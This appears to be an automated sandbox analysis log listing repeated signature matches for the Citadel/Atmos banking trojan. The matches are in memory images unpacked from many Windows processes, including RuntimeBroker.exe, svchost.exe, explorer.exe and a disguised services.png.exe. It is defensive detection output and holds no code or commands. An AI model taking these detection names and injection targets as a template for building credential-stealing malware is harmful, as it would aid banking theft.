Source: 29.3.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 29.3.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 29.3.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 7.3.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 7.3.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 7.3.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 18.0.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 18.0.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 18.0.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 9.3.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 9.3.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 9.3.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 17.0.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 17.0.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 17.0.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 9.3.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 9.3.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 9.3.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 5.3.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 5.3.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 5.3.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 15.3.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 15.3.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 15.3.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 28.0.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 28.0.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 28.0.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 25.0.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 25.0.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 25.0.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 0.2.services.png.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 0.2.services.png.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 0.2.services.png.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 25.3.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 25.3.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 25.3.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 17.3.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 17.3.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 17.3.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 0.3.services.png.exe.2590000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 20.3.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 20.3.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 20.3.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 22.0.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 22.0.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 22.0.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 0.2.services.png.exe.2810000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 0.2.services.png.exe.2810000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 27.0.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 27.0.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 27.0.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 6.0.explorer.exe.c350000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 6.0.explorer.exe.c350000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 17.0.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 17.0.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 17.0.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 1.3.nyheukpo.exe.20f0000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 25.3.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 25.3.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 25.3.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 16.0.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 16.0.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 16.0.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 10.0.SearchApp.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 10.0.SearchApp.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 10.0.SearchApp.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 18.3.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 18.3.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 18.3.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 21.3.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 21.3.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 21.3.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 0.2.services.png.exe.2810000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 0.2.services.png.exe.2810000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 16.3.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 16.3.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 16.3.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 19.0.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 19.0.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 19.0.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 18.3.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 18.3.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 18.3.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 26.0.conhost.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 26.0.conhost.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 26.0.conhost.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 8.3.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 8.3.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 8.3.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 19.0.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 19.0.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 19.0.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 21.0.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 21.0.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 21.0.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 28.0.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 28.0.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 28.0.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 17.3.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 17.3.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 17.3.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 23.0.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 23.0.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 23.0.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 4.0.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 4.0.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 4.0.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 22.3.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 22.3.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 22.3.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 3.3.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 3.3.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 3.3.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 14.0.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 14.0.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 14.0.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 23.3.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 23.3.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 23.3.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 26.3.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 26.3.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 26.3.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 3.3.svchost.exe.910000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 3.3.svchost.exe.910000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 3.3.svchost.exe.910000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 0.3.services.png.exe.2590000.1.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
